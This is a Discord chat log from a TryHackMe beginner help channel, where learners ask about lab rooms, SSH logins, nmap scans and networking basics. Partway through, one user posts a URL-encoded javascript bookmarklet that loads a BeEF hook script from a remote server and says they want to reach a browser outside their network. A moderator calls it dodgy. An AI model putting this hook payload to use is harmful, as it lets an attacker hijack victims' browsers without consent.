#pre-security-legacy-path

1 messages · Page 10 of 1

delicate forum
#

you have to remember that to send traffic somewhere you need an IP, but instead of knowing millions of IP's we use the A Record to tie a name to the IP

vapid epoch
#

Ok now i get it thanks!

clever galleon
#

I don't understand, the OSI model room doesn't have Layer 8 topics? 😉 lol

stiff harbor
potent wedge
#

shadow goes with "please do not trust service people anyway"

clever galleon
#

Oh no I am sorry, I know the OSI model, I was checking out the new courses. I just made a layer 8 joke

#

ID10T error joke lol

#

Programmers Do Not Throw Sausage Pizza Away

#

I used to know a dirty one too but I can't remember now. lol

potent wedge
#

or the fun one:

people don't need those stupid packages anyway

clever galleon
#

lol

potent wedge
#

helps you with remebering udp to a degree

clever galleon
#

UDP Packets

lost mural
#

pre-security done. Moving on, this is so exciting! CySec is really, really huge! snorlax

lavish gorge
#

Hello, as a complete beginner, I had just enrolled in "Starting Out In Cyber Sec" room and there in task 3 and 2 there are links that link to "Detect Attacks Using Splunk" and "Analyse Memory To Trace An Attackers Actions Using Volatility" etc for practical hands-on experience. Should I like complete those now itself? or like wait for tomorrow to complete?
#pre-security-legacy-path

drowsy coral
cyan forum
#

In "How websites work" in task 3 and 5, I have zero idea what the flag is/should be. There is no logic to those two tasks in according to providing a flag. I have done explicitly as written, but I dont see any way a flag would show - or any guidance to what the flags should be.

lavish gorge
somber currentBOT
#

Gave +1 Rep to @drowsy coral

cyan forum
#

In "Putting it all together" no flag is showed at the end of successfully completing the quiz

celest mason
#

Hi. I was checking the "new" room (I was not on THM since 3 months, didn't see it yet), on Linux Fondamentals part2, there's a wrong screenshot in task 5. After the sentence "The diagram below is a great representation of how these permissions can be translated", the screenshot is for the next part. about switching between users, instead on listing the read/write/execute permisions. Hope it helps

gritty dew
#

Hi, I'm in task 1 intro to Lan and I couldn't find the flag for this interactive lab. Can someone pls help me out?

#

Like, I'm done with a ring topology and bus topology, but I couldn't able to go further from here.

#

Am I missing something or doing something wrong? Pls someone correct me. I'm new here 😦

#

Sorted 👍

celest mason
#

Hi Vishal. For the bus topology , it is indicated in the previous messages that it is necessary to overload the network to make it fall by sending as many packets as possible (as this typology is not optimized, each packet will knock at all the doors until finding the good recipient).

patent temple
#

As the question asks you: add JavaScript that changes the demo element's content to "Hack the Planet"

#

You should get the output relatively easily, just take your time with the tasks as overloading yourself with information may burn you out 😄

#

Task 5, I had a problem with. I think I suggested it to the THM team, as the use of the "enter" button on your keyboard doesn't like it. Write your code within the "What's your name?" and physically click the button "say hi".

patent temple
#

edited, sorry James

topaz trail
#

Hi, in enumerating telnet normal nmap scans not working. Can anyone guide me which option to use

warm epoch
#

You know it's 4 digits long

marsh veldt
#

hey guys

#

pls help me asap

#

I am stuck at Windows fundamentals part 1 at task 6 last question

#

“What is the account status?”

#

WHAT IS THE ANSWER COS I LOOKED N I LOOKED AND I CANT FIND IT

#

😭😭

topaz trail
somber currentBOT
#

Gave +1 Rep to @warm epoch

rough delta
marsh veldt
#

Thank you 💗

nimble spoke
somber currentBOT
#

Gave +1 Rep to @stiff harbor

cyan forum
# patent temple Hello Evermore, if you have had help please ignore me. Task 3, you need to input...

Hi MrFernze
I see that it actually is broken.
When this is done in Chrome, an error occurs: "howwebsiteswork:1 A different origin subframe tried to create a JavaScript dialog. This is no longer allowed and was blocked. " So the task is broken, and will only work on certain browsers. I know that many in the community might not like Chrome, however on a learning page like this, it seems broken that a specific task wont work on chrome.

#

and same problem on task 5.

patent temple
#

@cyan forum I use chrome, I didnt have any issues for me. No clue...

zealous horizon
#

hello I am not rly sure if this is even the correct channel to ask that, but can someone explain ssh to me, i know its like on port 22 and is used to remotely do stuff, but... does port 22 need to be open on the device im connecting to? device im using? im like trying everything and nothing seems to work (also trying to connect to my other pc in the same network, not sure if the ip is even correct but i think so lmao)

#

and also can u do the stuff without using the attacker box and instead using your own terminal to connect to the thing

#

and if yes how

ripe geyser
#

@zealous horizon If u want to connect to a device using ssh, that device must have the ssh service running (mostly on port 22) and that port would be open. If u just need to connect to a device with ssh, port 22 on ur device doesn't need to be open. Ports are open when a service is running specific to that port.

grim phoenix
#

At 27 percent for pre security!

marsh veldt
#

Hi, I’m on VPN basics. It says « VPN that logs all of you data/history is essentially the same as not using a VPN in this regard ». The question is why then to use VPN if there is no anonymity? And the traffic can be tracked?

warm epoch
marsh veldt
somber currentBOT
#

Gave +1 Rep to @warm epoch

lunar sage
#

Hello Everyone! Just joined THM and this Discord Server, really excited about starting my Journey in Cyber Security, although I am a Complete Beginner, I hope to learn something of value everyday, let's begin! 😇

grizzled flax
#

Windows fundamentals is so dull

gilded garden
#

in Linux fundamentals 3, general /useful utils, after launching the server, my machine just sits there...

#

am i missing something, did i not read something?

#

so lost lol

alpine dock
#

Hello everyone. I have a question. I just completed the pre security path and im wondering if i can use it as ceu's for CySA+

#

or maybe i need to do the defensive path

#

?

marsh veldt
#

Hi, in the Windows Fundamentals 1, what's the answer please for:
Besides Clock, Volume, and Network, what other icon is visible in the Notification Are?: (2 words with 6 letters each), I can't find it. Thank you in advance.

mint flower
#

All you have to do is right click the bottom right icon and your answer should be there.

#

The notifications icon

marsh veldt
somber currentBOT
#

Gave +1 Rep to @mint flower

mint flower
#

I wouldn’t post the answer. But I’m glad you found it!

#

No problem!

marsh veldt
#

ok, i delete it

pseudo coral
#

Pre-Sec what’s up?

marsh veldt
#

Pre-Sec path finished today!!! 🎉

mint flower
#

Congrats!

marsh veldt
#

Thanks!..can’t wait to go the next path 💪

marsh veldt
#

Just finished off the OSI module. 🙂 Im just starting software dev and found the TCP UDP pretty cool. I am of course wondering what the quality assurance code would look like and such as a noob. Eye opening.

static prism
#

Hi guys, asking for some help regarding xfreerdp on mac, I'm not able to get it to work, so any advice or writeup?

Thanks

marsh veldt
dusky marsh
#

hey all anyone up to Windows Fundamental 2?

#

finding it hard to find out any of the questions tbh

#

one example is below, Im stuck i have spent few hours on google i can find anything

#

What is the command for Windows Troubleshooting? *.*********. / . << that is apparently the answer lol

rain vine
dusky marsh
#

Hey Serpente thanks eventually found it thanks 👍

hidden cypress
#

Hey guys,
In one of the lab they have showed how MAC spoofing works but they didn't show how to spoof MAC ?
Does anyone know about this ?

warm epoch
#

Google does

distant cargo
#

😆

normal marsh
#

"Deploy the interactive lab using the "View Site" button and spoof your MAC address to access the site. What is the flag?"
Could anyone explain to me what exactly I am supposed to do?

drowsy coral
normal marsh
drowsy coral
#

no problem, glad you got it. for most of the pre-security rooms the answer should be in the text associated with the task 😄 gl!

oblique solar
#

I need help, I have restarted it and terminated but nothing is working with Linux pt3 it keeps on denying me access what should I do?

rain berryBOT
warm epoch
#

Follow those steps, show screenshots
We can't see your screen, we don't know what you're doing so we can't really help

oblique solar
#

level 4 subscription premium

warm epoch
#

Look at what it's trying to do

#

It's trying to log in as root@tryhackme

#

not tryhackme@ip

oblique solar
#

so I have to type in ssh tryhackme@ip ?

#

So sorry I am quite new to all this I truly apologize for the inconvenience

#

thank you so much I really appreciate it.

ocean raven
#

Hi, I’m in “Extending your Network” task 6 : neither my iPad nor my Mac computer allow me to send any packet in the Network Simulator

ocean raven
#

Now using a windows pc everything went fine. What should I do to make it work on Apple? Thank you

naive bloom
#

hey I am having issues with the how websites work room. I have done all the exercises and I got them all correct. But it is not giving me the complete signal. Has this happened to anyone else ?

naive bloom
#

all good I worked it out

naive bloom
#

im stuck on question 8 of the windows fundamentals 1 "What is the last setting in the Control Panel view?

warm epoch
#

@ocean raven Please don't post answers

#

Guide them towards the answer with help, don't spoil it by dumping the answers

ocean raven
#

Oh ok. When I had problems yesterday nobody could help. But to delete answers you’re fast. 👍🏼👍🏼👏👏 The active machines are so frustrating: super slow, often won’t let me click or write where I should and won’t work on my Apple devices. Any help on that?

warm epoch
#

Make a Kali VM and use that?

ocean raven
warm epoch
#

Post in #site-bugs if the site is behaving differently on MacOS

naive bloom
#

okay I will post the bugs as well. But yes they can be slow.

low crescent
#

hello, I have a little problem

marsh veldt
#

Explain it directly prayge

low crescent
#

Sorry my guy

lusty knoll
#

wsp.

tranquil bough
#

I've done 2 rooms so far. Do I need to subscribe to do the pre sec course or is it free?

near bane
somber currentBOT
#

Gave +1 Rep to @near bane

nimble karma
#

Woot Just finished this path 😀

queen stump
balmy dawn
#

What path should I do next after pre security is complete? Is there any recommended order for paths?

buoyant swan
#

I think compteA is a good path

soft snow
buoyant swan
#

yes i agree on that too

balmy dawn
soft snow
buoyant swan
#

sincerely, i just finished pre-security me too but i dont feel like i can do something, do i need to practice or with time in learning paths i will develop my abilities. some advice plz

runic turtle
soft snow
# buoyant swan sincerely, i just finished pre-security me too but i dont feel like i can do som...

Ye, the pre security path is just a very very basic thing, so by simply doing that you won't be able to do much, there has to be much more practice and knowledge. So just keep on going with other paths, like the complete beginner one, even there you might be stuck sometimes, but your first approach should always be to google it. If you still not able to understand or find the solution, the THM community is a great place to ask for help.

nimble karma
queen stump
rich jungle
#

I'm having some issues with task n4 in linux fundamentals 2

#

can only open the attack box and not the deployable machine

runic turtle
rich jungle
somber currentBOT
#

Gave +1 Rep to @runic turtle

hazy rose
#

Hey

neat glade
#

hi

rain quiver
#

Yo

#

@hazy rose @neat glade get verified first !docs verify

#

!docs verify

rain berryBOT
rain quiver
#

Here u go

hoary oracle
#

Hey i've got a question

rich jungle
#

Hello, I'm having an issue getting the python3 HTTPServer to open in linux fundamentals 3, task 4.

#

this is what I get after I connect by ssh to the VM

warm epoch
rich jungle
#

ok so I can put in my command to download the file and it will work?

potent wedge
#

oh wait you might be starting that webserver on the wrong machine or trying to download it from the wrong one

median mica
# rich jungle

You need to type the command into a new terminal window. Currently, the http server is running from that window so you can't input anymore commands there until you stop it

somber currentBOT
#

Gave +1 Rep to @median mica

median mica
#

Np

neat glade
#

Are there any teams I can be a part of >>?

covert shard
#

^same, looking for one too, would be pretty cool

supple marlin
#

hello

formal condor
#

hi

viscid wedge
#

Hi !
I'm on the part 2 of the Linux Fundamentals, the task 2
But when I run the SSH command, i'm unable to enter the password, when I type it on my keyboard.

tepid shadow
viscid wedge
#

Oh, thanks ! 😄

north hearth
#

samething happened with me in my first time lmaoo

marsh veldt
#

Hey I got a question about networking. What does it mean when a subnet mask is 255.255.224.0? Why isn’t it just 255.255.255.0? Any help or info would be super appreciated. Thank you!

median mica
#

It means it's not a /24 network. If the subnet is 255.255.224.0 then it's a /19 network. Meaning there are more hosts on it.

marsh veldt
#

ok thank you @median mica

somber currentBOT
#

Gave +1 Rep to @median mica

inner star
#

outside of the obvious, (i.e. the name of the room) whats this place all about?

#

im trying to learn all I can and this place sounded like a reasonable place to start

median mica
#

Pre security is the pathway designed for people who want to get into CyberSec but don't have the comouter/networking background requires. You'll learn basic networking concepts, basic web concepts, and well as an in depth explanation of how the windows and Linux Operating Systems work

#

It will give you the required foundation to enter the Cyber Sec field

tidal forge
#

hello, i have a question. network-services -> Enumerating telnet -> for the answers a backdoor and Skidy. is there any other way to get those 2 results in an nmap scan without doing a full scan. i have tried watching youtubers and all of them either did a full scan or they searched online to get those 2 answers. i also tried different nmap commands and i can't get this as a result... all i get is "8012/tcp open unknown"

median mica
#

Can you send the Nmap command you used?

tidal forge
#

i tried the following nmaps : nmap -sT, sU, sS also sX but always limited to around 10 ports like -p 8010 - 8020

#

yesterday i did a full scan [nmap -A -sV -p- IP] of all the ports and it took me 1h:34min so i would like to be time efficient today and try to improve while i learn

median mica
#

Well, if you know what port you're looking for you can run a detained scan on that port alone. Nmap allows you to pick a specific port if you want to

#

You'll want to use the -A flag

#

And I usually use -T4 to speed the scan up a bit

tidal forge
#

thank you joker, this worked, nmap -A -sV -T4 -p8012 [IP]

median mica
#

Np

marsh veldt
#

Is it just me or does the Linux Part 2 Permissions 101 really disconnected? It keeps referencing a lot of stuff that isn't in the pre-security-pathway or the previous Linux parts.

median mica
#

Ot should be trying to teach you new things

#

If there's something you don't understand, Google it

#

That's the go to for most advanced things too so it's a good habit to get into

marsh veldt
#

ok thank you @median mica

somber currentBOT
#

Gave +1 Rep to @median mica

brave aurora
#

hi, i have a link that can connect to your system

#

but im not sure how to use it in my windows machine someone can help

#

?

#

javascript:%20(function%20()%20{%20var%20url%20=%20%27http://0.0.0.0:3000/hook.js%27;if%20(typeof%20beef%20==%20%27undefined%27)%20{%20var%20bf%20=%20document.createElement(%27script%27);%20bf.type%20=%20%27text%2fjavascript%27;%20bf.src%20=%20url;%20document.body.appendChild(bf);}})();

#

this connects to beef so dont use it plea

#

se

#

trying to run it as a js wont work

cinder nexus
#

What exactly are you trying to do?

brave aurora
#

im trying to access a windows browser outside of the network

cinder nexus
#

Pretty sure that beef is out of scope for this pathway ;)

brave aurora
#

?

#

i didnt understand you

cinder nexus
#

I mean that sounds dodgy

brave aurora
brave aurora
cinder nexus
#

Still sounds pretty dodgy to me

brave aurora
#

¯_(ツ)_/¯

#

btw will my ip be diffrent on windows and kali? if yes how do i see them both

cinder nexus
#

Yes

brave aurora
#

oh, got you

#

if i reveal my ip adress can anyone do anything with it?

cinder nexus
#

Just be warned that there are very few ethical uses for BeEF, and at your level basically none.

brave aurora
#

just the ip address

cinder nexus
#

Consider an ip address like a street address

brave aurora
#

oh

#

but what about the fact that there can only be 0-225 in a octanet?

#

there must be more than that in the whole world

cinder nexus
#

In an octet?

brave aurora
cinder nexus
#

There are 4 billion or so ipv4 addresses in the world. Though some sections are reserved for internal use only

brave aurora
#

oh,got you

brave aurora
cinder nexus
#

Notably the 10.0.0.0/8 range, the 192.168.0.0/16 range and another weird one in the 172s

cinder nexus
brave aurora
#

and as of now im trying to look for a way to learn hack windows and access stuff and how can i prevent it

cinder nexus
#

There are plenty of free rooms, I doubt you've done all of them

brave aurora
#

oh, ill check again but i think there were like 15 or less

cinder nexus
#

There are hundreds

brave aurora
#

oh

cinder nexus
#

Just a friendly warning, I'd carefully read the #rules and try to avoid contentious topics in the future, as you risk being banned.

brave aurora
#

@cinder nexus will

marsh veldt
#

What does it take to do one?

cinder nexus
#

You mean create one?

marsh veldt
#

This

#

Like the cat one

#

Or the others

cinder nexus
#

Oh yeah you can either use the search or the suggestions under the "learn" menu

#

There are no prerequisites

marsh veldt
#

No knowledge required

#

?

cinder nexus
#

Though some may be more difficult than others

#

Knowledge maybe ;)

#

But no arbitrary locks

marsh veldt
#

I'm very new to linux :(

#

I guess I'll have to wait a bit longer

cinder nexus
#

Did you do the Linux fundamentals rooms?

marsh veldt
#

Till I can do one

marsh veldt
#

I just finished studying DNS

cinder nexus
#

Might be a good start then

marsh veldt
#

Appreciate your help

#

Ty

edgy cobalt
#

Hello! This is kinda a basic question but I´ve been struggling with it for over 30 minutes, this is from Windows Fundamentals 1 , module 2:

Besides Clock, Volume, and Network, what other icon is visible in the Notification Area?


fickle ember
#

can anyone help having trouble with decentraland on my browser it says WEBGL2

warm epoch
#

@fickle ember This channel is for the tryhackme pre-security pathway

mint flower
somber currentBOT
#

Gave +1 Rep to @mint flower

mint flower
languid herald
#

hi, need some help for javascript task not sur i'm understand the task

languid herald
#

ok i found it but not sur that i really understand

mint flower
languid herald
#

how website work

#

maybe i need to go on the web-fundamentals-path?

mint flower
somber currentBOT
#

Gave +1 Rep to @languid herald

languid herald
#

i don't have the logic for web coding it's totaly abstract for me so even if i have the answer ( sorry if my english is quiet strange, i'm not english ^^)

#

is it fundamentals to know web coding in infosec?

#

or just a speciality?

mint flower
# languid herald or just a speciality?

Everyone will have a different answer for this question. It depends on what you end up focusing on. If you plan of doing a lot of web testing, knowing the basics of JavaScript can help a lot. Knowing how to read it and figure out what it is doing is important. Knowing a bit of JavaScript can be a really good thing.

languid herald
#

i would like to be a pentester so i think is indispensable no?

#

a lot of people around me told me to learn python

#

more than java or html5

mint flower
languid herald
#

thanks a lot man! and well i go now!

mint flower
marsh veldt
#

Hi, I'd like to ask you a question about my problem with the "Linux Fundamentals Part 3" room. At my ssh connection request, inserting username and password "tryhackme" without quotes, the message "Permission denied" appears. Could anyone help me? Everything is correct 😦

#

i'm trying to connect via attackbox..

limber oasis
#

What's the command you are using.

marsh veldt
#

i'm stupid, i'm sorry. I've inverted commands. instead tryhackme@IPADDRESS i write IPADDRESS@rain berry

limber oasis
#

Good to go then?

marsh veldt
#

yes, now it's work. thanks anyway for the support

languid herald
#

hello everyone! can someone tell me if in windows fundamentals2 task4 question 2 works? cause i have the good answer but it's tell me that is wrong can someone check please?

soft snow
runic crest
#

Hey everyone

#

👨‍💻

tidal ibex
#

for most of the presecurity i havent made notes but can memorize most of it, does it matter i dont have any notes, especially as i can go back later to remember

median mica
#

The presecurity stuff isn't particularly hard to remember. However, it's good to get into the habit of taking good notes because as you progress and learn more things you'll need notes to refer to. On top of that, it's just good to get into the habit of documenting everything you do

edgy cobalt
median mica
#

I started off using keepnote however it's very outdated. It's also not supported on Linux anymore if you ever end up swapping to a full Linux system. I like cherrytree which comes installed in kali. I think there's also a windows version for it but I'm not sure

edgy cobalt
somber currentBOT
#

Gave +1 Rep to @median mica

median mica
crystal meadow
#

Hello! I have a question for the Regex room, it was recommended at the end of the Linux Fundamentals. Is that alright for this room?

drifting rapids
#

hello i have a question about the windows fundementals 1 room

#

regarding a question i'm stuck on

warm epoch
#

If you would like help, you really need to ask the question outright.

shadow tiger
#

Can anyone tell me the sequence of rooms I should start learning. I have finished some basic rooms like linux fundamentals and nmap fundaments. What should come next?

soft snow
shadow tiger
#

Ok

#

Can you tell me how to find the ip address of our target?

soft snow
shadow tiger
soft snow
shadow tiger
soft snow
# shadow tiger What is the function of these programs?

Well that's basically companys who allow people to do penetration tests on their web application or other infrastructure (always read carefully on what the scope is) to find vulnerabilities and report it to those companys, where in return you get paid for it or other benefits. But that would be a possibility if you look for real world targets. But there is even a dedicated channel in the THM discord for that, where you might get better informations about that then from me. #bug-bounty

shadow tiger
#

Ok thanks man

soft snow
#

You are welcome

shadow tiger
#

I am trying to ping a machine in the same internet network with my kali machine. But it isn't happening. Any suggestion what might be wrong here?

coarse plover
#

Hello @shadow tiger maybe the machien doesn't accept ICMP (PING) try nmap it with verbose mode (-vv) and ignore ping using -Pn. Quick question though, did you connect to the network via openvpn ?

#

Hope it helps 🙂

warm epoch
sinful parrot
candid stream
warm epoch
soft snow
warm epoch
#

It might not reply to echos.
Something might be filtering all inbound or outbound ICMP traffic (not uncommon)

soft snow
somber currentBOT
#

Gave +1 Rep to @warm epoch

warm epoch
#

Blocking all ICMP outbound means you can't UDP scan effectively

#

You might be able to talk to a service like DNS but otherwise you're not going to be able to tell what's open

soft snow
#

Alright, thanks a lot.

warm epoch
#

It's worth mentioning that the default windows servwr firewall blocks ICMP from the public zone. THM VPN is marked as public, but AttackBox is usually counter as private zone

soft snow
warm epoch
soft snow
#

Will do 🙂

hazy rose
#

Hi guys

#

I have a question

#

in hacking domain

ember dust
#

Who here can help me read a firewall log ?

fleet narwhal
#

@ember dust What do you need help with?

ember dust
#

needed help in how to read a firewall log?

warm epoch
marsh veldt
#

I'm in the 'linux fundamentals part 2' room, and I can't connect to the machine.
I'm using the newest kali linux version, and configured openvpn successfully, but it says 'Connection Refused'

#

wow it worked right after i said that

ember dust
#

@warm epoch no

kind hinge
amber mist
#

I'm on the linux fundamentals part 1, task 3. I started the machine. And Received an IP address. I nmaped it and only open port is 22. How am I supposed to connect to this machine without credentials?

#

Its supposed to open within my browser, but doesn't.

#

nvm, adblock was blocking the side panel with the machine

iron pier
#

Hi, this is my first post here so please be patient and understanding. I'm generally happy with the service (thinking to buy it for our class) ... HOWEVER, while solving this first path I came across a bug/question that is a bit ridiculous compared to the complexity of the full TryHackMe experience. In room "Extending your network", question 1 is "
What layers of the OSI model do firewalls operate at?
"... Aside the complexity of this question for such a beginner room. I was forced to put in "Layer 3,Layer 2" which is what the video shows... AND when coming back to the question I see "Layer 3,Layer 4" as correct answers (as though I HAVE entered that). Soooo... which one is it ? (the correct answer)... I mean... I'm confused myself (I don't claim to know TOO much but still I should be teaching this at a beginner's level). Just saying that WHEN considering to take your subscription and buy it for 15 people - I'm not expecting this kind of "misleads"... Can anyone please assist me with this issue ? Thank you very much !

midnight marsh
#

Depends on the firewall, honestly. I'd say both are valid answers

warm epoch
iron pier
somber currentBOT
#

Gave +1 Rep to @warm epoch

opal root
#

Hi there, I am doing windows fundamentals room, trying to connect to the machine from remmina with RDP but it isn't connecting. Do I have to access it via OpenVPN?

heavy schooner
#

if you're not using the AttackBox or the web-based Kali/Windows machine to connect to the victim machine, you'd have to connect via OpenVPN

#

i think the web-based attacker boxes and the machines you spin up in THM are inside the same internal network, which is why you could e.g. directly do nmap scans on victim machines with the web-based boxes

#

but your own computer couldn't access this internal network unless you connect via OpenVPN

opal root
#

I'm not using attackbox or OpenVPN. I'm going to try. I should have checked.

#

I'm going to try with OpenVPN

heavy schooner
#

you'd have to pick between either of these two choices so that you could access the victim machines on THM

#

i personally use both: i've found the AttackBox to be able to do directory fuzzing, hash cracking and nmap scans much faster than my laptop could, whereas my laptop is mainly used for accessing the victim machine's services (SSH, web, FTP, SMB, ...)

marsh veldt
#

Windows Fundamentals 1
Trying to access the machine using rdesktop in Kali.

Failed to initialize NLA, do you have correct Kerberos TGT initialized ?
Failed to connect using NLA, trying with SSL
Failed to connect, CredSSP required by server (check if server has disabled old TLS versions, if yes use -V option).
Can someone help out?

Managed using xfreerdp

marsh veldt
soft snow
#

Alright

marsh veldt
soft snow
marsh veldt
soft snow
marsh veldt
somber currentBOT
#

Gave +1 Rep to @soft snow

marsh veldt
#

Windows Fundamentals 2:
How do you know that this share is hidden? (Besides having a peculiar name)

marsh veldt
#

Thanks to the community.

molten arch
#

Are the youtube video on top of each room the same as the text ?

toxic stream
#

hi guys I am new to this platform can you tell me what does it mean to be subscribed

#

every one is talking about getting verified and getting subscribed in bot channel

#

congratulation @marsh veldt

#

I appreciate your hard work and effort. Hope you learned a lot from this community.

#

I also look forward to be a part of it and learn a lot from each other

soft snow
toxic stream
#

so like do I have to pay for it on monthly bases

soft snow
toxic stream
#

oh I see

#

thanks for the info @soft snow

somber currentBOT
#

Gave +1 Rep to @soft snow

toxic stream
#

what is a +1 Rep

marsh veldt
soft snow
toxic stream
#

ok i guess the Robocop want me to give you a +1 rep 🙂

#

and how do I do it

soft snow
#

It's for saying thanks for example if someone helped you, he will get reputation for that.

toxic stream
#

I have seriously no idea how to use discord, my apologies

soft snow
toxic stream
#

okay and if I have to do it myself, then how would I do it

soft snow
#

Well by saying thanks and either answer to a message from someone or tag him, but tbh that reputation thing is not too important, it's kind of a fun gadget tbh

somber currentBOT
#

Gave +1 Rep to @soft snow

toxic stream
#

okay thanks a lot for clearing that out @soft snow

#

I got it know 🙂

#

@soft snow where have you reached in pre security so far

#

what have you finished lately

soft snow
toxic stream
#

wow that is so great

#

how do you feel now

#

did you apply all of the knowledge you learned on real machines

#

that you get when you subscribe to TryHackMe monthly package

soft snow
soft snow
#

I think most of the rooms from the jr pentester path are free anyways and you can deploy target machines without being subscriber. These target machines are not limited to 1 hour, it's only the attackbox (so the machine you are attacking the target machines with)

toxic stream
#

Wow that's great to know 👍

soft snow
#

If you set up your own VM with for example kali linux and connected via openvpn, you can just do all of the free rooms without time limitation

toxic stream
#

Awesome bro 👍

#

This is what I was talking about earlier

soft snow
# toxic stream This is what I was talking about earlier

Ok, well ye, it's just the attackbox and "better" vpn servers. I mean it's a very low price for the value of knowledge you get, there are other sites much much more expensive. But as I said, you can do all the rooms that are free without being subscriber and without time limitation too.

noble sedge
#

hey guys, need your little help. trying to establish my ssh but it just keeps saying "permission denied" whenever I fill in the password. what could be the matter?

#

password is "tryhackme", isn't it?

noble sedge
marsh veldt
noble sedge
#

or any other ips that I had before

plucky vault
turbid grove
median mica
turbid grove
#

Nope. Using the IP of my current machine.

median mica
#

Ok just making sure

turbid grove
#

Ya never know i guess haha

median mica
#

You'd be surprised how many people make that mistake

turbid grove
#

I can imagine.

median mica
#

So, just double checking, it's saying permission denied when you try to ssh into a room?

turbid grove
#

Yep after entering the password

#

It has for multiple days in a row.

median mica
#

Can you send the link for the room?

turbid grove
#

Im logged off for now. Will get back to you when I'm back on if that's cool

median mica
#

Yea no worries. I'll be busy most of the day tommorow, but I'm sure someone else will be able to help you. If not, then I'll help you out when I get a chance

turbid grove
#

I should mention, i successfully logged ssh in the past. I know how to do it but there seems to be an issue.

#

I think another guy mentioned it above.

elder fox
#

I think @marsh veldt had the same issue yesterday

noble sedge
# plucky vault Give a screenshot, it could be something else too

it seems like i can't send a screenshot here so I'll just copy my terminal:
root@ip-10-10-7-170:~# ssh tryhackme@10.10.7.170
The authenticity of host '10.10.7.170 (10.10.7.170)' can't be established.
ECDSA key fingerprint is SHA256:bcMHtOOcKrFlorgp2C65LGeywzwI++NiVqXZOmy1U.
Are you sure you want to continue connecting (yes/no)? yes
Warning: Permanently added '10.10.7.170' (ECDSA) to the list of known hosts.
tryhackme@10.10.7.170's password:
Permission denied, please try again.
tryhackme@10.10.7.170's password:

#

I've tried also using sudo but that doesn't help

soft snow
#

!docs verify

rain berryBOT
somber currentBOT
#

Gave +1 Rep to @soft snow

soft snow
soft snow
dense matrix
#

ok im stumped on what im doing wrong with my attack box. linux fundamentals part 3, i go to hss tryhackme@10.10 and use the password tryhackme but it's not letting me log into it

#

keeps saying the passwords wrong

marsh veldt
dense matrix
marsh veldt
dense matrix
#

ye it's fixed now. many thanks for the assistance!

somber currentBOT
#

Gave +1 Rep to @sterile walrus

noble sedge
marsh veldt
#

ok so in a typical layout for a home network, is the router both the default gateway and the network adress?

#

i get that the host adress is the specific device like a computer or something

warm epoch
#

The network address describes the network, not a device

marsh veldt
#

oh so the entire shibang of devices

warm epoch
#

Not really

#

You wouldn't use it to talk to the devices. It's really for writing/describing the network

marsh veldt
#

i get it now

#

so the host adress is a specific device on a network, a router or switch would be the gateway and it sends and receives stuff to other networks, and the network address is basically saying that a network exists

warm epoch
#

It makes a lot more sense when you can write it in binary

marsh veldt
#

probably

warm epoch
#

Switch wouldn't be a gateway.

marsh veldt
#

oh ok

warm epoch
#

Switches don't route between networks

#

Unless they're being routers

marsh veldt
#

ok i get it now

#

so would a switch hold a host adress?

warm epoch
#

Switches don't tend to have IP addresses unless it's for a management interface.

daring crystal
#

hi all

#

someones know how to pass trough this section

#

seems bugged

#

with a missing variable

#

ok seems its from safari navigator

#

i used another navigator to pass the test

boreal ether
#

im doing a linux fundamentals pt1 and i dont know how to pass this question

#

i run the attackbox and everything

#

but when it asks me to write username of who i'm logged in ason my linux deployed machine

warm epoch
#

@boreal ether that's the attackbox, not the target machine. Terminate the attackbox, deploy the machine in the earlier task.

boreal ether
#

i deployed it

warm epoch
#

Click linuxfun...

boreal ether
#

oooh

#

thanks for helping

autumn scaffold
#

Hey im now in network services 1 and im confused about a nmap command

#

whenever i want to answer a question like: What variant of FTP is running on it? I cant see it in my console

#

where I can see on other sites that they get stuff like this

#

PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 2.0.8 or later
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_-rw-r--r-- 1 0 0 353 Apr 24 11:16 PUBLIC_NOTICE.txt
| ftp-syst:
| STAT:
| FTP server status:
| Connected to ::ffff:10.9.0.54
| Logged in as ftp
| TYPE: ASCII
| No session bandwidth limit
| Session timeout in seconds is 300
| Control connection is plain text
| Data connections will be plain text
| At session startup, client count was 2
| vsFTPd 3.0.3 - secure, fast, stable
|_End of status
Service Info: Host: Welcome

#

what command are they using?

median mica
#

You have the answer there

autumn scaffold
#

I know

#

but i cant get this information on my consule

#

console

median mica
#

What nmap command did you use?

autumn scaffold
#

I used nmap -vv -sT 10.10.73.112 -p-

median mica
#

A few things. 1, you don't need -sT for this. 2, try adding in -A (which will run an aggressive scan. Note this will make the scan much longer so you might want to supply a specific port instead of doing -p-)

#

You can also use --script ftp-anon to enumerate FTP

autumn scaffold
#

ah I got it

#

thank you

rare sapphire
#

Hey guys, I'm on Linux Fundamentals Pt.3 task4. When I try to wget then the IP address to download the flag.txt it says connection refused. I cannot seem to get it to download the flag text. Any pointers?

median mica
#

!docs verify

rain berryBOT
median mica
#

follow that

#

then send screenshots

rare sapphire
median mica
#

send the link to the room

#

plz

rare sapphire
median mica
#

Youre missing a step. Youre currently ssh'ed into the target machine. You need to use python to set up an http server right there. Then open a new terminal window and use the wget command

rare sapphire
#

Thank you! I never would have figured that out. I have to do more reading on the python3 command, don't think I fully understand it.

weak basin
#

Hi guys I was solving Upload Vulnerabilities Module. But I am unable to install Gobuster using sudo apt-get in the web based Kali Linux provided by TryHackme. It keeps throwing me error. Can someone tell me what to do?

warm epoch
weak basin
somber currentBOT
#

Gave +1 Rep to @warm epoch

dense matrix
#

windows fundamentals task 6: what is the name of the other user account

i am stumped as hell and confused cus i did the thing where i go to the other users, all i see is TRY HACK ME which isnt working so i did lusrmgr.msc and tried literally everything that came up listed under users and still got nothing. i swear i'm gonna cry if it turns out i'm just spelling something wrong again when i put it in as an answer

#

never mind... i was in fact spelling something wrong

rare sapphire
dense matrix
#

thanks for answering my question. it turned out i was just spelling it wrong in the answer bar though

#

good ol dyslexia and all that

open pulsar
#

Okay, I’ve been messing with this far too long. What am I doing wrong here

soft snow
brittle birch
#

How to solve this? I can't understood exactly

warm epoch
#

@wild ledge I think this one's yours.
It's a cron job, not a crontab.
Crontab is the table, which lists jobs

open pulsar
somber currentBOT
#

Gave +1 Rep to @soft snow

runic shell
#

Are you supposed to have a good foundational understanding of the topic after completing a room? Because I feel like I'm learning so many new topics so briefly I'm going to forget them all tomorrow. Like I just finished the DNS room and if you asked me what a CNAME Record is I'd stare at you blankly. Am I doing the paths wrong?

soft snow
# runic shell Are you supposed to have a good foundational understanding of the topic after co...

